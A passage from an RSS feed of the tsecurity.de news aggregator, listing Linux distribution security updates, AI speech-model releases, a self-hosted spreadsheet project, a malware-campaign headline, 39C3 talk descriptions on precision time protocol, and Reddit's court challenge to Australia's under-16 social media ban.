<guid isPermaLink="true">https://tsecurity.de/de/3255209/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 05 Feb 2026 15:36:18 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (brotli, curl, kernel, python-wheel, and python3.12), <b>Debian</b> (containerd), <b>Fedora</b> (gnupg2, pgadmin4, phpunit10, phpunit11, phpunit12, phpunit8, phpunit9, and yarnpkg), <b>Mageia</b> (expat), <b>Oracle</b> (qemu-kvm and util-linux), <b>Red Hat</b> (kernel, kernel-rt, opentelemetry-collector, and python3.12-wheel), <b>SUSE</b> (abseil-cpp, dpdk, freerdp, glib2, ImageMagick, java-11-openj9, java-17-openj9, java-1_8_0-ibm, java-1_8_0-openj9, java-1_8_0-openjdk, java-21-openj9, kernel, libsoup, libsoup-3_0-0, openssl-3, patch, python-Django, rekor, rizin, udisks2, and xrdp), and <b>Ubuntu</b> (gh, linux, linux-aws, linux-azure, linux-azure-5.15, linux-gcp, linux-gke,
 linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iotg,
 linux-intel-iotg-5.15, linux-kvm, linux-lowlatency,
 linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra,
 linux-nvidia-tegra-5.15, linux-oracle, linux-raspi, linux, linux-aws, linux-azure, linux-gcp, linux-oem-6.17, linux-oracle,
 linux-raspi, linux-realtime, linux, linux-gke, linux-gkeop, linux-hwe-6.8, linux-oracle,
 linux-oracle-6.8, linux-raspi, linux-fips, linux-aws-fips, linux-azure-fips,  linux-gcp-fips, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-realtime, linux-intel-iot-realtime, and linux-realtime, linux-realtime-6.8, linux-raspi-realtime).]]></content:encoded>
</item>
<item>
<title><![CDATA[Mistral AI Launches Voxtral Transcribe 2: Pairing Batch Diarization And Open Realtime ASR For Multilingual Production Workloads At Scale]]></title>
<description><![CDATA[Automatic speech recognition (ASR) is becoming a core building block for AI products, from meeting tools to voice agents. Mistral’s new Voxtral Transcribe 2 family targets this space with 2 models that split cleanly into batch and realtime use cases, while keeping cost, latency, and deployment co...]]></description>
<link>https://tsecurity.de/de/3254292/ai-nachrichten/mistral-ai-launches-voxtral-transcribe-2-pairing-batch-diarization-and-open-realtime-asr-for-multilingual-production-workloads-at-scale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3254292/ai-nachrichten/mistral-ai-launches-voxtral-transcribe-2-pairing-batch-diarization-and-open-realtime-asr-for-multilingual-production-workloads-at-scale/</guid>
<pubDate>Thu, 05 Feb 2026 09:03:33 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Automatic speech recognition (ASR) is becoming a core building block for AI products, from meeting tools to voice agents. Mistral’s new Voxtral Transcribe 2 family targets this space with 2 models that split cleanly into batch and realtime use cases, while keeping cost, latency, and deployment constraints in focus. The release includes: Both models are […]</p>
<p>The post <a href="https://www.marktechpost.com/2026/02/04/mistral-ai-launches-voxtral-transcribe-2-pairing-batch-diarization-and-open-realtime-asr-for-multilingual-production-workloads-at-scale/">Mistral AI Launches Voxtral Transcribe 2: Pairing Batch Diarization And Open Realtime ASR For Multilingual Production Workloads At Scale</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Abschied von SAP Neo: Wie die FES ihre SAP-Datenintegration neu aufstellt]]></title>
<description><![CDATA[Nach der Einführung der Lösungen von CAS Realtime DataHub und Lobster_data erwartet der Entsorger eine zusätzliche Sicherheit gegenüber IT-Angriffen.]]></description>
<link>https://tsecurity.de/de/3252391/it-security-nachrichten/abschied-von-sap-neo-wie-die-fes-ihre-sap-datenintegration-neu-aufstellt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3252391/it-security-nachrichten/abschied-von-sap-neo-wie-die-fes-ihre-sap-datenintegration-neu-aufstellt/</guid>
<pubDate>Wed, 04 Feb 2026 11:35:46 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nach der Einführung der Lösungen von CAS Realtime DataHub und Lobster_data erwartet der Entsorger eine zusätzliche <b>Sicherheit</b> gegenüber <b>IT</b>-Angriffen.]]></content:encoded>
</item>
<item>
<title><![CDATA[From runtime risk to real‑time defense: Securing AI agents ]]></title>
<description><![CDATA[Why securing AI agents at runtime is essential as attackers find new ways to exploit generative orchestration.
The post From runtime risk to real‑time defense: Securing AI agents  appeared first on Microsoft Security Blog.]]></description>
<link>https://tsecurity.de/de/3231192/it-security-nachrichten/from-runtime-risk-to-realtime-defense-securing-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3231192/it-security-nachrichten/from-runtime-risk-to-realtime-defense-securing-ai-agents/</guid>
<pubDate>Fri, 23 Jan 2026 23:19:55 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Why securing AI agents at runtime is essential as attackers find new ways to exploit generative orchestration.</p>
<p>The post <a href="https://www.microsoft.com/en-us/security/blog/2026/01/23/runtime-risk-realtime-defense-securing-ai-agents/">From runtime risk to real‑time defense: Securing AI agents </a> appeared first on <a href="https://www.microsoft.com/en-us/security/blog">Microsoft Security Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Inworld AI Releases TTS-1.5 For Realtime, Production Grade Voice Agents]]></title>
<description><![CDATA[Inworld AI has introduced Inworld TTS-1.5, an upgrade to its TTS-1 family that targets realtime voice agents with strict constraints on latency, quality, and cost. TTS-1.5 is described as the number top ranked text to speech system on Artificial Analysis and is designed to be more expressive and ...]]></description>
<link>https://tsecurity.de/de/3226958/ai-nachrichten/inworld-ai-releases-tts-15-for-realtime-production-grade-voice-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3226958/ai-nachrichten/inworld-ai-releases-tts-15-for-realtime-production-grade-voice-agents/</guid>
<pubDate>Thu, 22 Jan 2026 00:32:02 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Inworld AI has introduced Inworld TTS-1.5, an upgrade to its TTS-1 family that targets realtime voice agents with strict constraints on latency, quality, and cost. TTS-1.5 is described as the number top ranked text to speech system on Artificial Analysis and is designed to be more expressive and more stable than prior generations while remaining […]</p>
<p>The post <a href="https://www.marktechpost.com/2026/01/21/inworld-ai-releases-tts-1-5-for-realtime-production-grade-voice-agents/">Inworld AI Releases TTS-1.5 For Realtime, Production Grade Voice Agents</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Sheets Alternative for the privacy and security enthusiasts.]]></title>
<description><![CDATA[Lightweight Self Hosted Collabrative Spreadsheets This program will install on most Linux systems...including my favorite, termux(android). It was made for the enthusiasts who wants complete sovereignty over their data. Free forever! Completely Free and and Open Tech Stack  SQLite Database Gunico...]]></description>
<link>https://tsecurity.de/de/3222423/linux-tipps/google-sheets-alternative-for-the-privacy-and-security-enthusiasts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3222423/linux-tipps/google-sheets-alternative-for-the-privacy-and-security-enthusiasts/</guid>
<pubDate>Tue, 20 Jan 2026 02:34:35 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Lightweight Self Hosted Collabrative Spreadsheets</p> <p>This program will install on most Linux systems...including my favorite, termux(android). It was made for the enthusiasts who wants complete sovereignty over their data. Free forever!</p> <p>Completely Free and and Open Tech Stack</p> <ul> <li>SQLite Database</li> <li>Gunicorn WSGI server backend</li> <li>Python for application routing</li> <li>Socket. io for realtime collaboration with multiple users.</li> <li>Pure HTML, CSS, JS front end</li> <li>Tor for worldwide encrypted connection to the service.</li> </ul> <p><a href="https://gitlab.com/here_forawhile/spreadsheet">Source</a></p> <p><a href="https://postimg.cc/t1VKGY1f">CLI</a></p> <p><a href="https://postimg.cc/TpN2R5wx">Home Page</a></p> <p><a href="https://postimg.cc/QF72RFKF">Example Sheet</a></p> <p>Install is from the command line</p> <pre><code>#Clone git clone https://gitlab.com/here_forawhile/spreadsheet.git #Change Directory cd spreadsheet #Make Install Script Executable chmod +x spreadsheet.sh #Install ./spreadsheet.sh install </code></pre> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/-CAPOTES-"> /u/-CAPOTES- </a> <br> <span><a href="https://i.redd.it/cu9d9qvh1deg1.jpeg">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1qhelvs/google_sheets_alternative_for_the_privacy_and/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[PHALT#BLYX Malware Campaign Targets European Hotels With Fake Booking Emails]]></title>
<description><![CDATA[  A fresh wave of digital threats emerged just after Christmas 2025, aimed squarely at European lodging spots. Instead of random attacks, it used clever email tricks made to look like they came from Booking.com. Staff members got messages that…
Read more →
The post PHALT#BLYX Malware Campaign Tar...]]></description>
<link>https://tsecurity.de/de/3213089/it-security-nachrichten/phaltblyx-malware-campaign-targets-european-hotels-with-fake-booking-emails/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3213089/it-security-nachrichten/phaltblyx-malware-campaign-targets-european-hotels-with-fake-booking-emails/</guid>
<pubDate>Wed, 14 Jan 2026 17:05:02 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  A fresh wave of digital threats emerged just after Christmas 2025, aimed squarely at European lodging spots. Instead of random attacks, it used clever email tricks made to look like they came from Booking.com. Staff members got messages that…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/phaltblyx-malware-campaign-targets-european-hotels-with-fake-booking-emails/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/phaltblyx-malware-campaign-targets-european-hotels-with-fake-booking-emails/">PHALT#BLYX Malware Campaign Targets European Hotels With Fake Booking Emails</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ElevenLabs Scribe v2: Neues Modell zur Transkription steht zur Verfügung]]></title>
<description><![CDATA[Raycast setzt bei seiner Diktierfunktion bereits seit November des vergangenen Jahres auf das ModellScribe v2 von ElevenLabs. Jetzt steht es wohl auch abseits der Raycast-Integration Nutzern, auch per API, zur Verfügung. Bei Scribe v2 Realtime handelt es sich um ein...Zum Beitrag: ElevenLabs Scri...]]></description>
<link>https://tsecurity.de/de/3210672/it-nachrichten/elevenlabs-scribe-v2-neues-modell-zur-transkription-steht-zur-verfuegung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3210672/it-nachrichten/elevenlabs-scribe-v2-neues-modell-zur-transkription-steht-zur-verfuegung/</guid>
<pubDate>Tue, 13 Jan 2026 17:02:17 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Raycast setzt bei seiner Diktierfunktion bereits seit November des vergangenen Jahres auf das ModellScribe v2 von ElevenLabs. Jetzt steht es wohl auch abseits der Raycast-Integration Nutzern, auch per API, zur Verfügung. Bei Scribe v2 Realtime handelt es sich um ein...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/elevenlabs-scribe-v2-neues-modell-zur-transkription-steht-zur-verfuegung/">ElevenLabs Scribe v2: Neues Modell zur Transkription steht zur Verfügung</a>
</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (chromium and sogo), Fedora (chromium, foomuuri, libpng, libsodium, mariadb10.11, musescore, nginx, python-pdfminer, python-urllib3, python3.12, seamonkey, wasmedge, and wget2), Mageia (curl, libpcap, sodium, wget2, and zlib), Slackware (lcms2), SUSE (c...]]></description>
<link>https://tsecurity.de/de/3208273/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3208273/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 12 Jan 2026 15:22:22 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (chromium and sogo), <b>Fedora</b> (chromium, foomuuri, libpng, libsodium, mariadb10.11, musescore, nginx, python-pdfminer, python-urllib3, python3.12, seamonkey, wasmedge, and wget2), <b>Mageia</b> (curl, libpcap, sodium, wget2, and zlib), <b>Slackware</b> (lcms2), <b>SUSE</b> (chromedriver, chromium, noopenh264, coredns, curl, dcmtk, fontforge, gdk-pixbuf-loader-libheif, gimp, kernel, libheif, libpng16, libsoup-2_4-1, libvirt, mariadb, php8, poppler, python-filelock, python-tornado6, python311-aiohttp, qemu, sssd, and traefik), and <b>Ubuntu</b> (libheif, libtasn1-6, linux-azure-nvidia, linux-kvm, linux-raspi, linux-raspi-realtime, and php7.2, php7.4, php8.1, php8.3, php8.4).]]></content:encoded>
</item>
<item>
<title><![CDATA[39C3 - Excuse me, what precise time is It?]]></title>
<description><![CDATA[Author: media.ccc.de - Bewertung: 3x - Views:26 https://media.ccc.de/v/39c3-excuse-me-what-precise-time-is-it

With PTP 1588, AES67, and SMPTE 2110, we can transmit synchronous audio and video with sub-millisecond latency over the asynchronous medium Ethernet. But how do you make hundreds of devi...]]></description>
<link>https://tsecurity.de/de/3185100/it-security-video/39c3-excuse-me-what-precise-time-is-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3185100/it-security-video/39c3-excuse-me-what-precise-time-is-it/</guid>
<pubDate>Mon, 29 Dec 2025 22:02:30 +0100</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: media.ccc.de - Bewertung: 3x - Views:26 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/dOt-zRIG5co?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://media.ccc.de/v/39c3-excuse-me-what-precise-time-is-it<br />
<br />
With PTP 1588, AES67, and SMPTE 2110, we can transmit synchronous audio and video with sub-millisecond latency over the asynchronous medium Ethernet. But how do you make hundreds of devices agree on the exact same nanosecond on a medium that was never meant to care about time?<br />
Precision Time Protocol (IEEE 1588) tries to do just that. It's the invisible backbone of realtime media standards like AES67 and SMPTE 2110, proprietary technologies such as Dante, and even critical systems powering high-frequency trading, cellular networks, and electric grids.<br />
<br />
Where even a few microseconds of drift can turn perfect sync into complete chaos.<br />
This talk takes a deep dive into the mysterious world of precise time distribution in large networks. We’ll start by exploring how PTP 1588 actually works, from announce, sync, and follow-up messages to delay measurements and the magic of hardware timestamping. We’ll look at why PTP is critical for modern audio/video-over-IP standards like AES67 and SMPTE 2110, and how they push Ethernet to its absolute temporal limits.<br />
Along the way, we’ll discover how transparent and boundary clocks fight jitter, and why your switch’s buffer might secretly hate you. We will do live Wireshark dissections of real PTP traffic, demos showing what happens when timing breaks, and some hands-on hardware experiments with grandmasters and followers trying to stay in sync.<br />
Expect packets, graphs, oscilloscopes, crashing live demos and at least one bad joke about time travel.<br />
<br />
Oliver Ettlin<br />
<br />
https://events.ccc.de/congress/2025/hub/event/detail/excuse-me-what-precise-time-is-it<br />
<br />
#39c3 #Hardware<br />
<br />
Licensed to the public under http://creativecommons.org/licenses/by/4.0<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Excuse me, what precise time is It? (39c3)]]></title>
<description><![CDATA[With PTP 1588, AES67, and SMPTE 2110, we can transmit synchronous audio and video with sub-millisecond latency over the asynchronous medium Ethernet. But how do you make hundreds of devices agree on the exact same nanosecond on a medium that was never meant to care about time?
Precision Time Prot...]]></description>
<link>https://tsecurity.de/de/3182136/it-security-video/excuse-me-what-precise-time-is-it-39c3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3182136/it-security-video/excuse-me-what-precise-time-is-it-39c3/</guid>
<pubDate>Sat, 27 Dec 2025 23:47:19 +0100</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[With PTP 1588, AES67, and SMPTE 2110, we can transmit synchronous audio and video with sub-millisecond latency over the asynchronous medium Ethernet. But how do you make hundreds of devices agree on the exact same nanosecond on a medium that was never meant to care about time?
Precision Time Protocol (IEEE 1588) tries to do just that. It's the invisible backbone of realtime media standards like AES67 and SMPTE 2110, proprietary technologies such as Dante, and even critical systems powering high-frequency trading, cellular networks, and electric grids.

Where even a few microseconds of drift can turn perfect sync into complete chaos.
This talk takes a deep dive into the mysterious world of precise time distribution in large networks. We’ll start by exploring how PTP 1588 actually works, from announce, sync, and follow-up messages to delay measurements and the magic of hardware timestamping. We’ll look at why PTP is critical for modern audio/video-over-IP standards like AES67 and SMPTE 2110, and how they push Ethernet to its absolute temporal limits.
Along the way, we’ll discover how transparent and boundary clocks fight jitter, and why your switch’s buffer might secretly hate you. We will do live Wireshark dissections of real PTP traffic, demos showing what happens when timing breaks, and some hands-on hardware experiments with grandmasters and followers trying to stay in sync.
Expect packets, graphs, oscilloscopes, crashing live demos and at least one bad joke about time travel.

Licensed to the public under http://creativecommons.org/licenses/by/4.0
about this event: https://events.ccc.de/congress/2025/hub/event/detail/excuse-me-what-precise-time-is-it]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (chromium, dropbear, mediawiki, php8.4, python-mechanize, rails, roundcube, usbmuxd, and wordpress), Fedora (cef, chromium, fonttools, gobuster, gosec, mingw-libpng, moby-engine, mqttcli, nextcloud, pgadmin4, python-unicodedata2, uriparser, and util-lin...]]></description>
<link>https://tsecurity.de/de/3174217/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3174217/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 22 Dec 2025 15:06:39 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (chromium, dropbear, mediawiki, php8.4, python-mechanize, rails, roundcube, usbmuxd, and wordpress), <b>Fedora</b> (cef, chromium, fonttools, gobuster, gosec, mingw-libpng, moby-engine, mqttcli, nextcloud, pgadmin4, python-unicodedata2, uriparser, and util-linux), <b>Mageia</b> (php and webkit2), <b>Oracle</b> (binutils, curl, gcc-toolset-13-binutils, gimp, git-lfs, kernel, openssh, php:8.3, podman, python-kdcproxy, python3.12, python3.9, skopeo, and webkit2gtk3), <b>Red Hat</b> (rsync), <b>Slackware</b> (php), <b>SUSE</b> (alloy, busybox, chromedriver, chromium, coredns-for-k8s, duc, firefox, kernel-devel, libpng16, libruby3_4-3_4, mariadb, netty, php8, python311-tornado6, rsync, taglib, and xen), and <b>Ubuntu</b> (linux-oracle-5.4, linux-raspi, linux-realtime-6.14, and linux-xilinx).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (node-url-parse), Fedora (assimp, conda-build, mod_md, util-linux, and webkitgtk), Oracle (firefox), SUSE (chromium, librsvg, poppler, python311, qemu, strongswan, webkit2gtk3, wireshark, and xen), and Ubuntu (linux-azure, linux-azure-5.4, linux-azure-5...]]></description>
<link>https://tsecurity.de/de/3164837/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3164837/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 17 Dec 2025 15:23:06 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (node-url-parse), <b>Fedora</b> (assimp, conda-build, mod_md, util-linux, and webkitgtk), <b>Oracle</b> (firefox), <b>SUSE</b> (chromium, librsvg, poppler, python311, qemu, strongswan, webkit2gtk3, wireshark, and xen), and <b>Ubuntu</b> (linux-azure, linux-azure-5.4, linux-azure-5.15, linux-azure-fips, and linux-raspi, linux-raspi-realtime, linux-xilinx).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (binwalk, glib2.0, libgd2, paramiko, and python-apt), Fedora (chromium, python3.13, python3.14, qt6-qtdeclarative, and usd), Mageia (ffmpeg, firefox, nspr, nss, and thunderbird), Oracle (kernel, mysql, mysql:8.0, mysql:8.4, ruby:3.3, wireshark, and xorg...]]></description>
<link>https://tsecurity.de/de/3162445/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3162445/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 16 Dec 2025 15:23:19 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (binwalk, glib2.0, libgd2, paramiko, and python-apt), <b>Fedora</b> (chromium, python3.13, python3.14, qt6-qtdeclarative, and usd), <b>Mageia</b> (ffmpeg, firefox, nspr, nss, and thunderbird), <b>Oracle</b> (kernel, mysql, mysql:8.0, mysql:8.4, ruby:3.3, wireshark, and xorg-x11-server), <b>Red Hat</b> (expat, mingw-expat, and rsync), <b>SUSE</b> (binutils, curl, glib2, gnutls, go1.24, go1.25, keylime, libmicrohttpd, libssh, openexr, postgresql15, python311, and xkbcomp), and <b>Ubuntu</b> (libsoup3, linux, linux-aws, linux-aws-6.8, linux-gcp, linux-gcp-6.8, linux-gke,
 linux-gkeop, linux-hwe-6.8, linux-ibm, linux-ibm-6.8, linux-lowlatency,
 linux-lowlatency-hwe-6.8, linux-nvidia, linux-nvidia-6.8,
 linux-nvidia-lowlatency, linux-oracle, linux-oracle-6.8, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-azure, linux-azure-6.14, linux-azure, linux-azure-6.8, linux-azure-fips, linux-fips, linux-fips, linux-aws-fips, linux-gcp-fips, linux-kvm, linux-oem-6.14, linux-raspi, and linux-realtime, linux-realtime-6.8).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (firefox, luksmeta, mysql, mysql:8.0, mysql:8.4, tomcat, and wireshark), Debian (chromium, kernel, and tzdata), Fedora (brotli, dr_libs, perl-Alien-Brotli, python-urllib3, singularity-ce, wireshark, and yarnpkg), Oracle (firefox, grafana, lasso, libs...]]></description>
<link>https://tsecurity.de/de/3155543/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3155543/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 12 Dec 2025 15:31:14 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (firefox, luksmeta, mysql, mysql:8.0, mysql:8.4, tomcat, and wireshark), <b>Debian</b> (chromium, kernel, and tzdata), <b>Fedora</b> (brotli, dr_libs, perl-Alien-Brotli, python-urllib3, singularity-ce, wireshark, and yarnpkg), <b>Oracle</b> (firefox, grafana, lasso, libsoup3, luksmeta, ruby, ruby:3.3, tomcat, and wireshark), <b>Slackware</b> (mozilla), <b>SUSE</b> (container-suseconnect, kubernetes-client, libpoppler-cpp2, postgresql14, postgresql15, and python3), and <b>Ubuntu</b> (c-ares, keystone, linux, linux-aws, linux-aws-5.15, linux-azure, linux-gcp, linux-gcp-5.15,
 linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15,
 linux-intel-iotg, linux-intel-iotg-5.15, linux-lowlatency,
 linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra,
 linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx, linux-oracle,
 linux-oracle-5.15, linux-xilinx-zynqmp, linux-azure, linux-azure-4.15, linux-oracle,, linux-fips, linux-aws-fips, linux-azure-fips, linux-gcp-fips, linux-fips, linux-aws-fips, linux-gcp-fips, linux-hwe-6.8, linux-oracle-6.8, linux-raspi, linux-realtime, linux-intel-iot-realtime, and python-urllib3).]]></content:encoded>
</item>
<item>
<title><![CDATA[Reddit launches high court challenge to Australia’s under-16s social media ban]]></title>
<description><![CDATA[Platform fighting world-leading ban on grounds it contravenes implied freedom of political communication in constitutionWill Australia’s social media ban survive a high court challenge?Reddit has filed a challenge against Australia’s under-16s social media ban in the high court, lodging its case ...]]></description>
<link>https://tsecurity.de/de/3155500/it-nachrichten/reddit-launches-high-court-challenge-to-australias-under-16s-social-media-ban/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3155500/it-nachrichten/reddit-launches-high-court-challenge-to-australias-under-16s-social-media-ban/</guid>
<pubDate>Fri, 12 Dec 2025 15:01:48 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Platform fighting world-leading ban on grounds it contravenes implied freedom of political communication in constitution</p><ul><li><p><a href="https://www.theguardian.com/commentisfree/2025/dec/11/social-media-ban-australia-teen-high-court-challenge">Will Australia’s social media ban survive a high court challenge?</a></p></li></ul><p>Reddit has filed a challenge against Australia’s under-16s social media ban in the high court, lodging its case two days after implementing age restrictions on its website.<br><br>
 The company said in a Reddit post on Friday that while it agreed with protecting people under 16, the law “has the unfortunate effect of forcing intrusive and potentially insecure verification processes on adults as well as minors, isolating teens from the ability to engage in age-appropriate community experiences”.</p><p>Reddit said there was an “illogical patchwork” of platforms included in the ban.</p> <a href="https://www.theguardian.com/australia-news/2025/dec/12/reddit-high-court-challenge-social-media-ban-australia-under-16s">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Reddit Launches High Court Challenge To Australia's Under-16s Social Media Ban]]></title>
<description><![CDATA[An anonymous reader quotes a report from the Guardian: Reddit has filed a challenge against Australia's under-16s social media ban in the high court, lodging its case two days after implementing age restrictions on its website. The company said in a Reddit post on Friday that while it agreed with...]]></description>
<link>https://tsecurity.de/de/3155411/it-security-nachrichten/reddit-launches-high-court-challenge-to-australias-under-16s-social-media-ban/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3155411/it-security-nachrichten/reddit-launches-high-court-challenge-to-australias-under-16s-social-media-ban/</guid>
<pubDate>Fri, 12 Dec 2025 14:21:59 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from the Guardian: Reddit has filed a challenge against Australia's under-16s social media ban in the high court, lodging its case two days after implementing age restrictions on its website. The company said in a Reddit post on Friday that while it agreed with protecting people under 16, the law "has the unfortunate effect of forcing intrusive and potentially insecure verification processes on adults as well as minors, isolating teens from the ability to engage in age-appropriate community experiences."
 
Reddit said there was an "illogical patchwork" of platforms included in the ban. "As the Australian Human Rights Commission put it, 'There are less restrictive alternatives available that could achieve the aim of protecting children and young people from online harms, but without having such a significant negative impact on other human rights.'" Reddit argued it was a forum primarily for adults without the traditional social media features the government has "taken issue with."
 
Reddit was challenging the law on the grounds it infringed on the implied freedom of political communication. It was also seeking to challenge whether Reddit could be considered an age-restricted social media platform under the legislation. It said it was not seeking to challenge the law to avoid compliance, and had implemented age-assurance measures since Wednesday. The company said the vast majority of Redditors were adults, and advertising wasn't targeted to children under 18. The Apple app store age rating for Reddit is 17+. "Despite the best intentions, this law is missing the mark on actually protecting young people online," Reddit said. "So, while we will comply with this law, we have a responsibility to share our perspective and see that it is reviewed by the courts."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Reddit+Launches+High+Court+Challenge+To+Australia's+Under-16s+Social+Media+Ban%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F25%2F12%2F12%2F041226%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F25%2F12%2F12%2F041226%2Freddit-launches-high-court-challenge-to-australias-under-16s-social-media-ban%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/25/12/12/041226/reddit-launches-high-court-challenge-to-australias-under-16s-social-media-ban?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by Debian (ffmpeg, firefox-esr, libsndfile, and rear), Fedora (httpd, perl-CGI-Simple, and tinyproxy), Oracle (firefox, kernel, libsoup, mysql8.4, tigervnc, tomcat, tomcat9, and uek-kernel), SUSE (alloy, curl, dovecot24, fontforge, glib2, himmelblau, java-17-open...]]></description>
<link>https://tsecurity.de/de/3153108/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3153108/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 11 Dec 2025 15:21:49 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
